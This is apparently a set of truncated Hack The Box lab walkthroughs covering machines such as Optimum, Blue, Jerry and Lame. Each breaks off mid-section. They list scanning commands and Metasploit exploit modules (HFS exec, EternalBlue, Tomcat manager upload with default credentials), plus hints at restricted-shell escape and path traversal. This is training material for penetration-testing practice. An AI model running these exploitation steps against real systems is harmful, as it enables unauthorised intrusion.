HTB Optimum

$nmap -A -sV -p-
$nikto -h
$searchsploit hfs
$cat /usr/share/exploitdb/exploits/windows/remote/346
msf5 > search hfs
msf5 > use 1
msf5 exploit(windows/http/rejetto_hfs_exec) > options
msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost
msf5 exploit(windows/http/rejetto_hfs_exec) > run
meterpreter > ls
meterpreter > cat user.txt.txt
meterpreter > getuid
meterpreter > sysinfo
Sysinfo shows that we are on a Windows 2012 R2 server with x64 architecture. Due to the fact that the default reverse_tcp

HTB Blue

$nmap -A -T4 -p- -sV
Result analysis:
135: windows rpc
139: smb
445: smb
OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
$nmap -p 445 --script vuln
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
C:\Windows\system32>whoami
C:\Users>dir
C:\Users>cd haris
C:\Users\haris>cd Desktop
C:\Users\haris\Desktop>dir
C:\Users\haris\Desktop>type user.txt
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
C:\Users\Administrator\Desktop>type root.txt

HTB Jerry

$nmap -A -T4 -p- -sV -Pn
$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e
$nikto -h
Access to
Use the credentials found in Nikto’s results (tomcat/s3cret).
As we can observe, we are able to upload and deploy a WAR file.
msf5 > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > options
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost
msf5 exploit(multi/http/tomcat_mgr_upload) > set

HTB Devel

$nmap -T4 -sV -p- -A
Open ports detected:
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5
$nikto -h
$nmap -p 80 --script vuln
$nmap -p 21 --script vuln
$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt
Nothing very useful was found up to this point.
$ftp
ftp> dir
ftp> put test.txt
ftp> dir
So, if we can upload any file, can we

HTB Legacy

$sudo nmap -A -T4 -p-
Open ports detected:
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Based on the detected ports, we have SMB here.
$ msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options
msf5 auxiliary(scanner/smb/smb_version) > run
Which SMB version do we have? Not sure yet…
$nmap -p139 --script smb-protocols -Pn
$nmap -p445 --script smb-protocols -Pn
According to

HTB Lame

$nmap -T4 -p- -A -Pn
Open ports detected:
21/tcp  open  ftp vsftpd 2.3.4
22/tcp  open  ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
$ftp
No files are detected.
$ssh
$msfconsole
Install Searchsploit:
$sudo apt update && sudo apt -y install exploitdb
$searchsploit

HTB Starting Point – Base

$./
Ports detected:
22/tcp open  ssh  OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http Apache httpd 2.4.29 ((Ubuntu))
$gobuster dir -u -w /usr/share/wordlists/dirb/big.txt
Interesting items found: /_uploaded and /login
Access to
The login folder can be listed (due to a misconfiguration of the web server).
Foothold
Download all three files to analyze them. login.php.swp is a binary file.
$ls -la
$file login.php.swp
As it is described, login.php.swp

HTB Starting Point – Guard

$./
The SSH port is open. Let’s try the last SSH user we obtained.
$ssh -i id_rsa daniel@
The SSH login gives us access to a restricted shell, where commands like find, cat and python are disabled. We are unable to read user.txt from this shell. The man command can be used to spawn a bash shell. Once the command opens the manual, we can enter the following command to spawn a

HTB Starting Point – Markup

$./
Open ports:
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt
The Apache service is running. Let’s try to access the site.
Access to
In the previous machine, we found credentials stored in an SQL dump. Let’s try to reuse them to log into the application. The

HTB Starting Point – Included

$./
Open ports detected:
80/tcp open  http   Apache httpd 2.4.29 ((Ubuntu))
Access to: redirection to
Use Owasp-Zap to scan this site:
This machine is vulnerable to a File Inclusion Path Traversal attack. According to the application description: The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a